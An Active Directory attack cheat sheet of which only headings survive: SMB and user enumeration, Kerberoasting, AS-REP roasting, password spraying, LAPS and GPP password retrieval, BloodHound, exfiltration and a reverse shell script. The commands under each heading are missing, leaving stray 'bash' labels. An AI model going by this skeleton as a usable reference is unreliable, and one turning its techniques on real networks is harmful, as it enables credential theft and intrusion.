Active Directory Cheat Sheet

Table of Contents

1. SMB Enumeration

2. User Enumeration

3. LDAP/LAPS Enumeration

4. Kerberos Attacks

5. Credential Attacks

6. BloodHound Collection

7. File Transfer Methods

8. Windows Post-Exploitation

9. Privilege Escalation

10. ADCS (Certificate Services)

11. ACL Abuse

12. Miscellaneous Tools

SMB Enumeration

SMB Share Listing

Always try multiple tools for listing shares:

Crawling Shares & Extracting Files

LNK File Attack (SMB Write Permission / NTLM Theft)

SMB Server (File Transfer)

User Enumeration

Username Enumeration via RID Brute

Impacket Tools

Kerbrute (Kerberos User Enumeration)

Nmap Kerberos Enumeration

Other Enumeration Tools

Extract Usernames from Website

Useful Wordlists

• /usr/share/seclists/Usernames/Names/names.txt

• /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

LDAP/LAPS Enumeration

Basic LDAP Enumeration

Authenticated LDAP Searches

LAPS (Local Administrator Password Solution)

Query LAPS passwords for managed computers:

bash

Get GPP Passwords

NetExec LDAP Modules

Kerberos Attacks

Request TGT & Usage

kerberoasting

From Compromised Service Account (Rubeus)

AS-REP Roasting

Clock Skew Fix

Credential Attacks

Password Spraying

SSH Key Spray

Hash Cracking

BloodHound Collection

bloodhound-python

Rusthound

bash

File Transfer Methods

SMB Server (Covered in SMB section above)

PowerShell Download

Perl Download

Base64 Exfiltration

Finding SID

DNS Enumeration

Stable Reverse Shell Script